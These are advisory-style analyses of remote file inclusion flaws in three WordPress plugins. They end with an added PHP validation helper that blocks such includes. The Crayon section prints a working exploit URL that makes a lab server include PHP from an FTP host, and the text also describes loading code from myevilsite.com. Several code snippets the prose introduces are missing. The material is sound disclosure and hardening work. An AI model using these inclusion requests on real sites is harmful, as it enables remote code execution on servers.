WordPress Floating Social Media Link Plugins Remote File Inclusion

Advisory

Secunia Advisory SA51346

Analysis
Both fsml-admin.js.php and fsml-hideshow.js.php require a GET parameter that specifies the path to the wp-load.php file, which is used to initialize the WordPress backend.
However, the wpp parameter is used without any validation that it does not contain malicious input. We can thus provide a URL to malicious PHP code, which will be executed by the remote host, like this:

 

WordPress Advanced Custom Fields remote file inclusion vulnerability

Advisory

Secunia Advisory SA 51037

Analysis of vulnerability
A Remote File Inclusion vulnerability exists in the Advanced Custom Fields plugin for WordPress. By exploiting an unsafe use of array_merge on user input in /core/actions/export.php, it is possible to override a value used for an include:

By posting another value for acf_abspath to the script, we can overwrite the value that is used for the two require_once calls. For instance, a request like this will fetch /wp-load.php and /wp-admin/admin.php from myevilsite.com:


 

WordPress Crayon Syntax Highlighter remote file inclusion vulnerability

Advisory

Secunia advisory SA 50804

Analysis of vulnerability

The Crayon Syntax Highlighter implements a vulnerable RPC-like system for AJAX in /util/ajax.php and /util/preview.php. Both files begin with the same 3 lines of code:

So it appears that it at least attempts to do some validation. Let us see how that is implemented in global.php (included by crayon_wp.class.php):

So it calls crayon_is_php_file, which checks that the provided path is a file, that the extension is “php”, and that the filename is the expected one, which in this case is wp-load.php. In theory, this should be safe if we assume that is_file only returns true for local files. However, because is_file also supports FTP, we can get it to return true for a remote file on an FTP server! This means that if the server allows URL includes, we can do a remote file include from a malicious FTP server hosting a wp-load.php file through a URL like this, either through ajax.php or preview.php:

http://192.168.80.130/wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php
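
For contrast with the is_file-based check described above, here is one way to validate such a path so that stream wrappers never reach an include. This is an added example, not code from Crayon or the other plugins; the function name resolve_local_wp_load, the allowed-root parameter and the sample paths are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not code from any of the plugins above.
// Returns the resolved path only if it is a local file named wp-load.php
// located inside $allowedRoot; returns null for everything else.
function resolve_local_wp_load(string $candidate, string $allowedRoot): ?string
{
    // Refuse anything with a URL-style scheme (ftp://, http://, php://, data:).
    // Two or more scheme characters are required so that a Windows drive
    // letter such as C:\ is not mistaken for a scheme.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $candidate)) {
        return null;
    }
    // realpath() resolves local filesystem paths only and collapses
    // ../ segments and symlinks, so the checks below see the real target.
    $real = realpath($candidate);
    $root = realpath($allowedRoot);
    if ($real === false || $root === false) {
        return null;
    }
    // The resolved path must sit under the allowed root.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Only now apply the name and file-type checks.
    if (basename($real) !== 'wp-load.php' || !is_file($real)) {
        return null;
    }
    return $real;
}

// Constructed demo: a throwaway directory standing in for a WordPress root.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'wp_demo_' . bin2hex(random_bytes(4));
mkdir($root);
file_put_contents($root . DIRECTORY_SEPARATOR . 'wp-load.php', "<?php // stub\n");

$cases = [
    $root . '/wp-load.php',                // local file under the root
    'ftp://192.0.2.10/wp-load.php',        // FTP stream wrapper
    'http://example.invalid/wp-load.php',  // HTTP stream wrapper
    $root . '/../wp-load.php',             // traversal out of the root
];
foreach ($cases as $c) {
    $r = resolve_local_wp_load($c, $root);
    echo str_pad($c, 50), ' => ', $r === null ? 'rejected' : 'accepted', PHP_EOL;
}
unlink($root . DIRECTORY_SEPARATOR . 'wp-load.php');
rmdir($root);
```

A check like this complements, rather than replaces, keeping allow_url_include disabled in php.ini; the more robust design is to not take the include path from the request at all.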